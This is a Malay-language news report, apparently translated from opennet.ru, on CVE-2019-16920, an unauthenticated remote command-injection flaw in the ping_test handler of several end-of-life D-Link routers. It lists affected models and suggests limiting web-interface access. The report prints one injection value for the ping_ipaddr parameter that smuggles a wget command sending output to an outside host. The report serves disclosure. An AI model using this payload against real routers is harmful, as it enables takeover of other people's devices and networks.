Kerentanan yang boleh dieksploitasi dari jauh dalam penghala D-Link

Dalam penghala wayarles D-Link dikenalpasti kerentanan berbahaya (CVE-2019–16920), yang membolehkan anda melaksanakan kod dari jauh pada sisi peranti dengan menghantar permintaan khas kepada pengendali "ping_test", boleh diakses tanpa pengesahan.

Menariknya, menurut pembangun perisian tegar, panggilan "ping_test" harus dilaksanakan hanya selepas pengesahan, tetapi pada hakikatnya ia dipanggil dalam apa jua keadaan, tanpa mengira log masuk ke antara muka web. Khususnya, apabila mengakses skrip apply_sec.cgi dan menghantar parameter "action=ping_test", skrip mengubah hala ke halaman pengesahan, tetapi pada masa yang sama melakukan tindakan yang dikaitkan dengan ping_test. Untuk melaksanakan kod tersebut, kelemahan lain telah digunakan dalam ping_test itu sendiri, yang memanggil utiliti ping tanpa menyemak dengan betul alamat IP yang dihantar untuk ujian. Sebagai contoh, untuk memanggil utiliti wget dan memindahkan hasil perintah "echo 1234" kepada hos luaran, hanya nyatakan parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Kerentanan yang boleh dieksploitasi dari jauh dalam penghala D-Link

Kehadiran kelemahan telah disahkan secara rasmi dalam model berikut:

  • DIR-655 dengan perisian tegar 3.02b05 atau lebih lama;
  • DIR-866L dengan perisian tegar 1.03b04 atau lebih lama;
  • DIR-1565 dengan perisian tegar 1.01 atau lebih lama;
  • DIR-652 (tiada maklumat tentang versi perisian tegar yang bermasalah disediakan)

Tempoh sokongan untuk model ini telah pun tamat, jadi D-Link beliau menyatakan, yang tidak akan mengeluarkan kemas kini untuk mereka menghapuskan kelemahan, tidak mengesyorkan menggunakannya dan menasihati menggantikannya dengan peranti baharu. Sebagai penyelesaian keselamatan, anda boleh mengehadkan akses kepada antara muka web kepada alamat IP yang dipercayai sahaja.

Ia kemudiannya mendapati bahawa kelemahan itu juga mempengaruhi model DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 dan DIR-825, merancang untuk mengeluarkan kemas kini yang belum diketahui.

Sumber: opennet.ru

Tambah komen